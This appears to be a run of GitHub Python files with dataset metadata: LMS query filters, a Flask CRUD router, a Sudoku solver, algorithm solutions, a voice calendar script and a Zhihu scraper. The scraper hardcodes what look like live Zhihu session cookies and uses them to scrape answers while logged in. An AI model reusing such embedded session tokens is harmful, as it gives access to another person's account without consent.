filters.ModelMultipleChoiceFilter(\n label='Instructors',\n field_name='uuid',\n to_field_name='uuid',\n queryset=InstructorProfile.objects.all(),\n )\n\n student_groups = filters.ModelMultipleChoiceFilter(\n label='Student Groups',\n field_name='uuid',\n to_field_name='uuid',\n 
queryset=StudentGroup.objects.all(),\n    )\n\n    class Meta:\n        model = Course\n        fields = ('code', 'title', 'instructors', 'student_groups',)\n\n    @property\n    def qs(self):\n        parent = super().qs\n        user = getattr(self.request, 'user', None)\n\n        # hasattr takes a plain attribute name; a dotted 'user.studentprofile' never matches\n        if hasattr(user, 'studentprofile'):\n            return parent.filter(student_groups__in=user.studentprofile.student_groups)\n        if hasattr(user, 'instructorprofile'):\n            return parent.filter(instructors=user.instructorprofile)\n        return parent\n\n\nclass TimetableFilter(filters.FilterSet):\n    course = filters.ModelChoiceFilter(\n        label='Course',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=Course.objects.all(),\n    )\n\n    class Meta:\n        model = Timetable\n        fields = (\n            'code', 'title', 'course', 'course__code', 'course__title',\n            'start_date', 'end_date',\n        )\n\n    @property\n    def qs(self):\n        parent = super().qs\n        user = getattr(self.request, 'user', None)\n\n        if hasattr(user, 'studentprofile'):\n            return parent.filter(course__student_groups__in=user.studentprofile.student_groups)\n        if hasattr(user, 'instructorprofile'):\n            return parent.filter(course__instructors=user.instructorprofile)\n        return parent\n\n\nclass TimetableItemFilter(filters.FilterSet):\n    timetable = filters.ModelChoiceFilter(\n        label='Timetable',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=Timetable.objects.all(),\n    )\n\n    instructor = filters.ModelChoiceFilter(\n        label='Instructor',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=InstructorProfile.objects.all(),\n    )\n\n    students = filters.ModelMultipleChoiceFilter(\n        label='Students',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=StudentProfile.objects.all(),\n    )\n\n    class Meta:\n        abstract = True\n        fields = (\n            'title', 'timetable', 'instructor', 'students', 'start_time',\n            'end_time',\n        )\n\n    @property\n    def qs(self):\n        parent = super().qs\n        user = getattr(self.request, 'user', None)\n\n        if hasattr(user, 'studentprofile'):\n            return parent.filter(students=user.studentprofile)\n        if hasattr(user, 'instructorprofile'):\n            return parent.filter(instructor=user.instructorprofile)\n        return parent\n\n\nclass PeriodicTimetableItemFilter(TimetableItemFilter):\n    class Meta:\n        abstract = True\n        fields = TimetableItemFilter.Meta.fields + ('weekday', 'repeat_type',)\n\n\nclass NonPeriodicTimetableItemFilter(TimetableItemFilter):\n    class Meta:\n        abstract = True\n        fields = TimetableItemFilter.Meta.fields + ('date',)\n\n\nclass AssignmentFilter(NonPeriodicTimetableItemFilter):\n    class Meta:\n        model = Assignment\n        fields = NonPeriodicTimetableItemFilter.Meta.fields + ()\n\n\nclass SolutionFilter(filters.FilterSet):\n    assignment = filters.ModelChoiceFilter(\n        label='Assignment',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=Assignment.objects.all(),\n    )\n\n    student = filters.ModelChoiceFilter(\n        label='Student',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=StudentProfile.objects.all(),\n    )\n\n    class Meta:\n        model = Solution\n        fields = ('assignment', 'student', 'created_at',)\n\n    @property\n    def qs(self):\n        parent = super().qs\n        user = getattr(self.request, 'user', None)\n\n        if hasattr(user, 'studentprofile'):\n            return parent.filter(student=user.studentprofile)\n        if hasattr(user, 'instructorprofile'):\n            return parent.filter(assignment__instructor=user.instructorprofile)\n        return parent\n\n\nclass GradeFilter(filters.FilterSet):\n    solution = filters.ModelChoiceFilter(\n        label='Solution',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=Solution.objects.all(),\n    )\n\n    
instructor = filters.ModelChoiceFilter(\n        label='Instructor',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=InstructorProfile.objects.all(),\n    )\n\n    class Meta:\n        model = Grade\n        fields = ('value', 'solution', 'instructor', 'created_at',)\n\n    @property\n    def qs(self):\n        parent = super().qs\n        user = getattr(self.request, 'user', None)\n\n        if hasattr(user, 'studentprofile'):\n            return parent.filter(solution__student=user.studentprofile)\n        if hasattr(user, 'instructorprofile'):\n            return parent.filter(instructor=user.instructorprofile)\n        return parent\n\n\nclass EventFilter(filters.FilterSet):\n    event_type = filters.ModelChoiceFilter(\n        label='Event Type',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=EventType.objects.all(),\n    )\n\n    timetable = filters.ModelChoiceFilter(\n        label='Timetable',\n        field_name='uuid',\n        to_field_name='uuid',\n        queryset=Timetable.objects.all(),\n    )\n\n    @property\n    def qs(self):\n        parent = super().qs\n        user = getattr(self.request, 'user', None)\n\n        if hasattr(user, 'studentprofile'):\n            return parent.filter(timetable__course__student_groups__in=user.studentprofile.student_groups)\n        if hasattr(user, 'instructorprofile'):\n            return parent.filter(timetable__course__instructors=user.instructorprofile)\n\n        return parent\n\n    class Meta:\n        model = Event\n        fields = (\n            'title', 'event_type', 'event_type__title', 'timetable',\n            'timetable__code',\n        )\n","repo_name":"relidaar/lms-api","sub_path":"api/education/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"20278834822","text":"'''\n    Router layer\n\n'''\nfrom flask import request\nfrom flask_restx import Namespace, Resource\nfrom Test_pingtai.case_table.log_util import logger\nfrom Test_pingtai.server import api, db\nfrom Test_pingtai.service.testcasse_service import Testcase\n\ncase_ns = Namespace(\"case\", description=\"Test case management\")\n\n\n@case_ns.route(\"/\")\nclass TestCaseServer(Resource):\n\n    get_parser = api.parser()\n    get_parser.add_argument(\"case_id\", type=int, location=\"args\")\n    '''\n    Query\n    '''\n    @case_ns.expect(get_parser)\n    def get(self):\n        logger.info(f\"request header {request.headers}\")\n        logger.info(\"get method\")\n        logger.info(f\"request args:{request.args}\")\n        case_id = request.args.get(\"case_id\")\n\n        # delegate to the service layer's business logic\n        testcase = Testcase()\n        datas = testcase.get(case_id)\n        # response payload\n        return datas\n\n\n\n    \"\"\"\n    These are the fields entered on the definition page\n    \"\"\"\n    api_parser = api.parser()\n    api_parser.add_argument(\"case_id\", type=int, required=True, location=\"json\")\n    api_parser.add_argument(\"case_title\", type=str, required=True, location=\"json\")\n    api_parser.add_argument(\"remark\", type=str, location=\"json\")\n\n\n    '''\n    Create method - POST\n    '''\n    @case_ns.expect(api_parser)\n    def post(self):\n        # log request info\n        logger.info(\"post method\")\n        logger.info(f\"request params:{request.json}\")\n\n        # get the JSON data from the request body\n        case_data = request.json\n        case_id = case_data.get(\"case_id\")\n        case_title = case_data.get(\"case_title\")\n        remark = case_data.get(\"remark\")\n        testcase = Testcase()\n        datas = testcase.post(case_id=case_id,case_title=case_title,remark=remark)\n        if datas:\n            return {\"code\": 200, \"message\": \"added successfully\"}\n        else:\n            return {\"code\": 401, \"message\": \"ID already exists\"}\n\n\n\n    update_parser = api.parser()\n    update_parser.add_argument(\"case_id\", type=int, required=True, location=\"json\")\n    update_parser.add_argument(\"case_title\", type=str, required=True, 
location=\"json\")\n update_parser.add_argument(\"remark\", type=str, location=\"json\")\n\n\n \"\"\"\n 修改方法\n \"\"\"\n @case_ns.expect(update_parser)\n def put(self):\n logger.info(\"put method\")\n # 获取请求头中的json数据\n case_data = request.json\n logger.info(f\"request params:{request.json}\")\n testcase = Testcase()\n exits = testcase.put(case_data)\n if exits:\n return {\"code\": 200, \"message\": f\"{case_data.get('case_id')} success change\"}\n else:\n return {\"code\": 4002, \"message\": \"id not found\"}\n\n\n\n\n delete_parser = api.parser()\n delete_parser.add_argument(\"case_id\", type=int, required=True, location=\"json\")\n '''\n 删除方法 \n '''\n\n @case_ns.expect(delete_parser)\n def delete(self):\n logger.info(\"delete method\")\n logger.info(f\"reuqest params:{request.json}\")\n\n # 获取请求头中的json数据\n case_data = request.json\n # 获取json中id值\n case_id = case_data.get(\"case_id\")\n\n if case_id:\n TestCase.query.filter_by(case_id=case_id).delete()\n\n # 提交数据库中\n db.session.commit()\n db.session.close()\n return {\"code\": 200, \"message\": \"delete success\"}\n else:\n\n return {\"code\": 402, \"message\": \"case 不存在\"}\n","repo_name":"tascdy-lyz/test_platform","sub_path":"router/testcase.py","file_name":"testcase.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42209729692","text":"from sys import stdin\ninput = stdin.readline\n\n\ndef get_next(x, y):\n if y == M-1:\n return x+1, 0\n return x, y+1\n\n\ndef get_prev(x, y):\n if y == 0:\n return x-1, M-1\n return x, y-1\n\n\nN, M = map(int, input().split(\" \"))\n\narr = [[0]*M for _ in range(N)]\nsum_arr = [[0]*M for _ in range(N)]\nfor i in range(N):\n arr[i] = list(map(int, input().split(\" \")))\n for j in range(M):\n if i == 0 and j == 0:\n sum_arr[i][j] = arr[i][j]\n continue\n\n prev_coord = get_prev(i, j)\n sum_arr[i][j] = sum_arr[prev_coord[0]][prev_coord[1]] + arr[i][j]\n\nK = int(input())\nfor _ in range(K):\n # (i, j) ~ (x, y) 닫힌 구간의 합\n i, j, x, y = [d-1 for d in map(int, input().split(\" \"))]\n if i == 0 and j == 0:\n print(sum_arr[x][y])\n elif i == x and j == y :\n print(arr[i][j])\n else:\n result = (sum_arr[x][y] - sum_arr[x][get_prev(x, j)[1]]) + (sum_arr[i][y] - sum_arr[i][get_prev(i, j)[1]])\n print(result)\n\n\n","repo_name":"ssoso27/Smoothie2","sub_path":"pythAlgo/baekjoon/sum_of_2_dimen_array.py","file_name":"sum_of_2_dimen_array.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70123296747","text":"# import pygame\n# from color import Color\n\n\nclass Grid:\n ROWS: int = 9\n COLS: int = 9\n COLS_PER_BOX: int = COLS // 3\n ROWS_PER_BOX: int = ROWS // 3\n SENTINEL: int = 0\n VALUES: tuple[int, ...] 
= (1, 2, 3, 4, 5, 6, 7, 8, 9)\n\n\n def __init__(self, grid: list[list[int]]=[]) -> None:\n self.grid: list[list[int]] = [[Grid.SENTINEL] * Grid.COLS for _ in range(Grid.ROWS)]\n self.pencil_grid: list[list[set[int]]] = [[set() for _ in range(Grid.COLS)] for _ in range(Grid.ROWS)]\n self._rowValues: list[set[int]] = [set() for _ in range(Grid.ROWS)]\n self._colValues: list[set[int]] = [set() for _ in range(Grid.COLS)]\n self._boxValues: list[set[int]] = [set() for _ in range(Grid.COLS)]\n if grid:\n self._initialiseBoard(grid)\n\n\n def __repr__(self) -> str:\n result: list[str] = []\n for row in range(Grid.ROWS):\n if row > 0 and row % 3 == 0:\n # 1 2 3 | 4 5 6 | 7 8 9\n result.append(\"---------+---------+---------\")\n # 1 2 3 | 4 5 6 | 7 8 9\n resultRow = []\n for col in range(Grid.COLS):\n if col > 0 and col % 3 == 0:\n resultRow.append(\"|\")\n if self.grid[row][col] == 0:\n resultRow.append(\" \")\n else:\n resultRow.append(f\" {self.grid[row][col]} \")\n result.append(\"\".join(resultRow))\n return \"\\n\".join(result)\n\n\n def _initialiseBoard(self, grid: list[list[int]]) -> None:\n assert len(grid) == Grid.ROWS, \"incorrect number of rows in input\"\n for row in grid:\n assert len(row) == Grid.COLS, \"incorrect number of columns in input\"\n \n for row in range(Grid.ROWS):\n for col in range(Grid.COLS):\n value: int = grid[row][col]\n self.grid[row][col] = value\n if not value:\n continue\n # isInRow[row] is a set containing all the values in that row\n \n # checking if the board being created is actually valid before creating it\n boxNum: int = Grid.getBoxNum(row, col)\n assert (value not in self._rowValues[row] | \n self._colValues[col] | \n self._boxValues[boxNum]), \"unsolvable board created\"\n \n self.setGridValue(row, col, value)\n\n\n def _getNextEmptyCellCoordinates(self) -> tuple[int, int] | None:\n for row in range(Grid.ROWS):\n for col in range(Grid.COLS):\n if self.grid[row][col] == 0:\n return (row, col)\n return None\n\n @staticmethod\n def getBoxNum(row: int, col: int) -> int:\n return (row // 3) * 3 + (col // 3)\n\n\n def isValidAssignment(self, row: int, col: int, value: int) -> bool:\n boxNum = Grid.getBoxNum(row, col)\n return (row in range(Grid.ROWS) and col in range(Grid.COLS) and \n value in range(1, len(Grid.VALUES) + 1) and\n value not in (self._rowValues[row] | self._colValues[col] |\n self._boxValues[boxNum]))\n\n\n def _resetGridValue(self, row: int, col: int) -> None:\n value: int = self.grid[row][col]\n \n if value == Grid.SENTINEL:\n # if the value was already null then return\n return\n \n # removing the value from the grid\n self.grid[row][col] = Grid.SENTINEL\n \n # removing the value from the \n boxNum: int = Grid.getBoxNum(row, col)\n self._rowValues[row].discard(value)\n self._colValues[col].discard(value)\n self._boxValues[boxNum].discard(value)\n\n\n def setGridValue(self, row: int, col: int, value: int) -> None:\n assert self.isValidAssignment(row, col, value), \"invalid assignment\"\n \n self.grid[row][col] = value\n boxNum: int = Grid.getBoxNum(row, col)\n self._rowValues[row].add(value)\n self._colValues[col].add(value)\n self._boxValues[boxNum].add(value)\n\n\n def updatePencilValue(self, row: int, col: int, value: int) -> None:\n assert (row in range(Grid.ROWS) and col in range(Grid.COLS) and\n value in range(1, len(Grid.VALUES) + 1)), \"invalid assignment\"\n \n if value in self.pencil_grid[row][col]:\n # if this number was already present then remove it from the set\n self.pencil_grid[row][col].remove(value)\n else:\n # if this 
number was not present then add it to the set\n self.pencil_grid[row][col].add(value)\n\n\n def resetPencilValue(self, row: int, col: int) -> None:\n assert (row in range(Grid.ROWS) and col in range(Grid.COLS)), \"invalid coordinates\"\n self.pencil_grid[row][col].clear()\n\n\n def solve(self) -> bool:\n nextEmptyCell: tuple[int, int] | None = self._getNextEmptyCellCoordinates()\n if not nextEmptyCell:\n # if all cells have been filled and no empty cells then solving is complete\n return True\n \n # if there is an empty cell then unpack it\n row, col = nextEmptyCell\n \n for value in Grid.VALUES:\n # loop through all the possible values\n if not self.isValidAssignment(row, col, value):\n continue\n \n # if we can assing a value to this empty cell then assign it\n self.setGridValue(row, col, value)\n \n # now check for the remaining board\n if self.solve():\n return True\n \n # if the rest of the board was not solvable then undo this assignment\n self._resetGridValue(row, col)\n \n # if none of the values worked out then \n return False\n","repo_name":"Garth-brick/sudoku","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34425439978","text":"# link : https://leetcode.com/problems/count-zero-request-servers/description/\n# author : Mohamed Ibrahim\nclass Solution:\n def countServers(self, n: int, logs: List[List[int]], x: int, queries: List[int]) -> List[int]:\n res, cnt = [0] * len(queries), Counter()\n i, j, used = 0, 0, 0\n logs.sort(key=lambda l : l[1])\n for [t, id] in sorted([t, id] for id, t in enumerate(queries)):\n while i < len(logs) and logs[i][1] <= t:\n cnt[logs[i][0]] += 1\n used += cnt[logs[i][0]] == 1\n i += 1\n while j < i and logs[j][1] < t - x:\n cnt[logs[j][0]] -= 1\n used -= cnt[logs[j][0]] == 0\n j += 1\n res[id] = n - used\n return res\n","repo_name":"M0hamedIbrahim1/-Data-Structure-Algorithms","sub_path":"Two Pointers/Problems/2747. Count Zero Request Servers.py","file_name":"2747. Count Zero Request Servers.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"23863319001","text":"# Sentence1: William I have to deliver practice 3 on 1st of July from 3:15 pm to 5 pm\n# Sentence2: William I have to deliver practice 3 on 2nd of July at 3:15 pm\n# Sentence3: on 3rd of july, William, I have to go to my parents house at half past four pm.\n\n#from asr import recording_voice, split_parts, Get_Event_Elements\nimport asr\n#from create_event import init_credentials, new_event\nimport create_event as ce\n\ndef main():\n # call scripts\n approved = False\n while not approved:\n string = asr.recording_voice()\n print(\"Is that what you said? 
(Y/n)\")\n if ('Y' or 'y') in input():\n approved = True\n \n eventContent, date, hour = asr.split_parts(string)\n \n summary, start_time, end_time = asr.Get_Event_Elements(eventContent, date, hour)\n\n #print(\"Summary:\",summary,\"\\n\")\n #print(\"Start time:\", start_time,\"\\n\")\n #print(\"End time:\",end_time,\"\\n\")\n\n ce.init_credentials()\n ce.new_event(start_time, summary, end_time)\n\n return True\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"EduardVergesFranch/AST_FinalProject_Baldi_Marti_Bausa_Cesc_Verges_Eduard","sub_path":"calendar_main.py","file_name":"calendar_main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37124470302","text":"#Function to Find the longest Substring which has non repeating characters\n\ndef findLongestSub(s):\n left = 0\n right = 0\n m = {}\n length = len(s)\n answer = 0\n while left < length and right < length:\n element = s[right]\n if element in m:\n left = max(left, m[element])\n m[element] = right\n answer = max(answer, right - left+1)\n right = right + 1 \n return answer\n\ns = 'ababdhksoia'\n\nlen_sub = findLongestSub(s)\n\nif len_sub == -1:\n print('There was error with the code')\nelse:\n print('The length of longest substring is {}'.format(len_sub))","repo_name":"droidy12527/AlgorithmsInPythonandCpp","sub_path":"longestsubstringwithnorepeatingchars.py","file_name":"longestsubstringwithnorepeatingchars.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13031474546","text":"import math\nimport tkinter as tk\nimport time\n\nmy_w = tk.Tk()\n#my_w.tk.call('tk', 'scaling',200)\nwidth,height=410,410 # set the variables \nc_width,c_height=width-5,height-5 # canvas width height\nd=str(width)+\"x\"+str(height)\nmy_w.geometry(d) \nc1 = tk.Canvas(my_w, width=c_width, height=c_height,bg='lightgreen')\nc1.grid(row=0,column=0,padx=5,pady=5,columnspan=3)\ndial=c1.create_oval(10, 10, 400, 400,width=10,outline='#FF0000',fill='#FFFFFF')\nx,y=205,205 # center \nx1,y1,x2,y2=x,y,x,10 # second needle \ncenter=c1.create_oval(x-8,y-8,x+8,y+8,fill='#c0c0c0')\nr1=180 # dial lines for one minute \nr2=130 # for hour numbers before the lines \nin_degree = 0\nh=iter(['12','1','2','3','4','5','6','7','8','9','10','11'])\nfor i in range(0,60):\n in_radian = math.radians(in_degree) # converting to radian\n if(i%5==0): \n ratio=0.85 # Long marks ( lines )\n t1=x+r2*math.sin(in_radian) # coordinate to add text ( hour numbers )\n t2=x-r2*math.cos(in_radian) # coordinate to add text ( hour numbers )\n c1.create_text(t1,t2,fill='blue',font=\"Times 30 bold\",text=next(h)) # number added\n else:\n ratio=0.9 # small marks ( lines )\n \n x1=x+ratio*r1*math.sin(in_radian)\n y1=y-ratio*r1*math.cos(in_radian)\n x2=x+r1*math.sin(in_radian)\n y2=y-r1*math.cos(in_radian)\n c1.create_line(x1,y1,x2,y2,width=1) # draw the line for segment\n in_degree=in_degree+6 # increment for next segment\n\nmy_w.mainloop()","repo_name":"Wakorithegreat/inspire-in-stem","sub_path":"classes/analog.py","file_name":"analog.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6771341611","text":"import requests\nfrom requests.cookies import RequestsCookieJar\nfrom bs4 import BeautifulSoup\nfrom PIL import Image \nimport base64\nfrom time import sleep\nimport time\nimport hmac\nfrom 
hashlib import sha1\nimport json\nimport re\n\ndef simulate_login():\n session=requests.session()\n headers={\n 'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0',\n }\n session.headers.update(headers)\n picture=None\n signature=None\n picture_url=None\n\n message=session.get(url='https://www.zhihu.com/api/v3/oauth/captcha?lang=en').json() \n print(message)\n if message['show_captcha'] == False:\n picture=''\n else:\n picture_url = session.put(url='https://www.zhihu.com/api/v3/oauth/captcha?lang=en').json()\n # 采用base64格式将验证码通过图片格式显示出来\n with open('captcha.jpg','wb') as f:\n f.write(base64.b64decode(picture_url['img_base64']))\n image=Image.open('captcha.jpg')\n image.show()\n picture=input('请输入验证码')\n sleep(2)\n message1=session.post(url='https://www.zhihu.com/api/v3/oauth/captcha?lang=en',data={'input_text':picture}).json() # post 验证码\n print(message1)\n\n a=hmac.new('d1b964811afb40118a12068ff74a12f4'.encode('utf-8'),digestmod=sha1)\n a.update('qaz7417417474741'.encode('utf-8'))\n a.update(b'c3cef7c66a1843f8b3a9e6a1e3160e20')\n a.update(b'com.zhihu.web')\n a.update(str(int(time.time()*1000)).encode())\n signature=a.hexdigest()\n\n data={\n 'client_id':'c3cef7c66a1843f8b3a9e6a1e3160e20',#'c3cef7c66a1843f8b3a9e6a1e3160e20',\n 'grant_type':'password',\n 'timestamp':str(int(time.time()*1000)),\n 'source':'com.zhihu.web',\n 'signature':signature,\n 'username':'xxxxxx@sina.com',\n 'password':'xxxxxxx',\n 'captcha':picture,\n 'lang':'en'\n }\n\n headers = {\n 'content-type':'application/x-www-form-urlencoded',\n 'x-zse-83':'3_2.0',\n }\n message=session.post(url='https://www.zhihu.com/api/v3/oauth/sign_in', headers=headers, data=data)\n message.encoding='utf-8'\n print(message.text)\n print(json.loads(message.text)['error']['message'])\n hot_page = session.get('https://www.zhihu.com/hot', headers=headers)\n return hot_page\n\n\nheaders = {\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'user-agent': ': Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36',\n 'cookie': '_zap=775904c7-650c-49cc-a58e-16f0801e92d5; d_c0=\"AFDu7XwQWBCPTljIztnS-_L2AyijmBAJj10=|1573567809\"; _xsrf=gr8hNhot8mvpKAYl2nOGxxxBSLluiZd6; Hm_lvt_98beee57fd2ef70ccdd5ca52b9740c49=1573026345,1573482896,1573537949,1573567912; capsion_ticket=\"2|1:0|10:1573570033|14:capsion_ticket|44:MjIzOWNjODM5MzBiNGIwYjg4MGY3NDc2NGFkOTk5ZTk=|4d7696b5a11b756bb78450c1b678b7ed04ffb85c2de46f0f95670d4f9f13d3ef\"; z_c0=\"2|1:0|10:1573570047|4:z_c0|92:Mi4xMXIzMkFRQUFBQUFBVU83dGZCQllFQ1lBQUFCZ0FsVk5feE80WGdCbnh0WGp5RXVpRXpoVzJuUldoQjIxUjZwQzZn|ad171eab66492267ef55551ebb067a7580d494083ee984729ef04285b8f93606\"; tgw_l7_route=116a747939468d99065d12a386ab1c5f; Hm_lpvt_98beee57fd2ef70ccdd5ca52b9740c49=1573610499; tst=h; tshl='\n}\ncookie_jar = RequestsCookieJar()\ncookie_jar.set(\"z_c0\", \"2|1:0|10:1573570047|4:z_c0|92:Mi4xMXIzMkFRQUFBQUFBVU83dGZCQllFQ1lBQUFCZ0FsVk5feE80WGdCbnh0WGp5RXVpRXpoVzJuUldoQjIxUjZwQzZn|ad171eab66492267ef55551ebb067a7580d494083ee984729ef04285b8f93606:FG=1\")\ndef use_cookies():\n hot_page = requests.get('https://www.zhihu.com/hot', headers=headers, cookies=cookie_jar)\n return hot_page\n \nget_answer_url = 
'https://www.zhihu.com/api/v4/questions/{}/answers?include=data%5B%2A%5D.is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_collapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_count%2Ccan_comment%2Ccontent%2Ceditable_content%2Cvoteup_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2Cupdated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Crelationship.is_authorized%2Cis_author%2Cvoting%2Cis_thanked%2Cis_nothelp%2Cis_labeled%2Cis_recognized%2Cpaid_info%2Cpaid_info_content%3Bdata%5B%2A%5D.mark_infos%5B%2A%5D.url%3Bdata%5B%2A%5D.author.follower_count%2Cbadge%5B%2A%5D.topics&limit=5&offset={}&platform=desktop&sort_by=default'\n\nhot_page = use_cookies()\nhot_html = BeautifulSoup(hot_page.text, 'html.parser')\nhot_items = hot_html.find_all('section', 'HotItem')\nfor i, hot_item in enumerate(hot_items):\n question_url = hot_item.a['href']\n hot_name = hot_item.a['title']\n if not re.match(r'https://www.zhihu.com/question/(.*)', question_url):\n continue\n question_id = re.match(r'https://www.zhihu.com/question/(.*)', question_url).groups()[0]\n \n question_page = requests.get(question_url, headers=headers, cookies=cookie_jar)\n question_html = BeautifulSoup(question_page.text, 'html.parser')\n\n answers = []\n for offset in range(0, 46, 5):\n answer_res = requests.get(get_answer_url.format(question_id, offset), headers=headers)\n answers.extend(json.loads(answer_res.text)['data'])\n sleep(3)\n with open('zhihu_data/'+str(i)+'.json', 'w', encoding='utf-8') as file:\n file.write(json.dumps({'title': hot_name, 'answers': answers}, ensure_ascii=False))","repo_name":"APTX-4869-MDZZ/e-commerce-PJ","sub_path":"Crawler/zhihuCrawler.py","file_name":"zhihuCrawler.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73572151786","text":"from ._eda_distribution import (\n cat_feature_report, num_feature_report, na_bar_plot, target_distribution_plot)\nfrom ._eda_datashift import area_plot, ridge_plot\n\n\ndef unsupported_calplot(*args, **kwargs):\n raise ImportError('Не установлен calplot. 
Нажми `pip install calplot`))')\n\n\ntry:\n    import calplot\n    have_calplot = True\nexcept ImportError:\n    have_calplot = False\n\nif have_calplot:\n    from ._eda_datashift import na_datashift\nelse:\n    na_datashift = unsupported_calplot\n\n__all__ = [\n    # distribution\n    'cat_feature_report',\n    'num_feature_report',\n    'na_bar_plot',\n    'target_distribution_plot',\n    # data_shift\n    'area_plot',\n    'na_datashift',\n    'ridge_plot',\n]\n","repo_name":"mikhailmartin/my_ds_tools","sub_path":"eda/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"6018249116","text":"todo_list=[]\n\ndef display_menu():\n    print(\"Simple Todo list\")\n    print(\"1- Display The TODO list\")\n    print(\"2- Add items to TODO list\")\n    print(\"3- Mark item as complete\")\n    print(\"4- Mark item as incomplete\")\n    print(\"5- Delete item\")\n    print(\"6- Exit the Programme\")\n    \ndef display_list():\n    # start numbering before the loop so each task gets its own number\n    task_number=1\n    for item in todo_list:\n        task_name=item[0]\n        task_status=item[1]\n        print(f\"{task_number} | {task_name} | {task_status}\")\n        task_number+=1\n\ndef add_item(task):\n    todo_list.append(task)\n    \ndef change_task_status(task_number,task_status):\n    task=todo_list[task_number-1]\n    completed_task=(task[0],task_status)\n    todo_list[task_number-1]=completed_task\n    \n    \n\nwhile True:\n    display_menu()\n    choice=int(input(\"Please enter your choice :\"))\n    if choice==1:\n        display_list()\n    elif choice==2:\n        item_name=input(\"Enter the Task name :\")\n        is_complete=False\n        task=(item_name, is_complete)\n        add_item(task)\n    elif choice==3:\n        task_number=int(input(\"Enter the task number to complete :\"))\n        change_task_status(task_number,True)\n    elif choice==4:\n        task_number=int(input(\"Enter the task number to incomplete :\"))\n        change_task_status(task_number,False)\n    elif choice==5:\n        # handle the \"Delete item\" menu option\n        task_number=int(input(\"Enter the task number to delete :\"))\n        todo_list.pop(task_number-1)\n    elif choice==6:\n        # handle the \"Exit the Programme\" menu option\n        break\n","repo_name":"Ayodhya-98/Python-To-do-list","sub_path":"todoapp.py","file_name":"todoapp.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"21066340548","text":"# sys for argument acceptance, math for operations\nimport sys\nimport math\n\n# Globals\n# earth radius in meters (6.37 million)\nr_earth = 6370000\n# speed of light in m/s\nc_speed = 299792458\n# constant in meters per second, squared\ngrav_const = 9.80665\n\n\ndef printOutput(alt, iter, time_total, vel_total, inc_count):\n    print(\"Altitude: \", alt, \"m | \", \"Iterator: \", iter, \" m\")\n    print(\"Time (hrs): \", round((time_total / 3600), 2), \" hrs\")\n    print(\"Time total: \", round(time_total, 2), \" s\")\n    print(\"Final velocity: \", round(vel_total, 3), \" m/s | \", round((vel_total / c_speed), 3), \"c\")\n    print(\"Speed of light: \", c_speed, \" m/s\")\n    print(\"Iterations: \", inc_count)\n\ndef calcGravity(alt_inc):\n    grav_new = ((r_earth / (r_earth + alt_inc)) ** 2)\n    grav_new *= grav_const\n    return grav_new\n\ndef calcTime(time_inc, iter, grav_new, vel_inc):\n    time_inc = -((math.sqrt((2 * iter * grav_new) + math.pow(vel_inc, 2)) + vel_inc) / grav_new)\n    # time_inc = math.sqrt((2 * iter) / grav_new)\n    return time_inc\n\ndef calcVelocity(grav_new, time_inc):\n    vel_inc = (grav_new * time_inc)\n    return vel_inc\n\n\ndef main(iter, alt):\n\n    # cast arguments to floats to avoid bugs (sys.argv values arrive as strings)\n    iter = float(iter)\n    alt = float(alt)\n    # convert kilometers to meters\n    alt = alt * 1000\n    # already in meters or fractions of meters\n\n    inc_count = 0 # iteration counter for debugging\n\n    alt_inc = alt # 
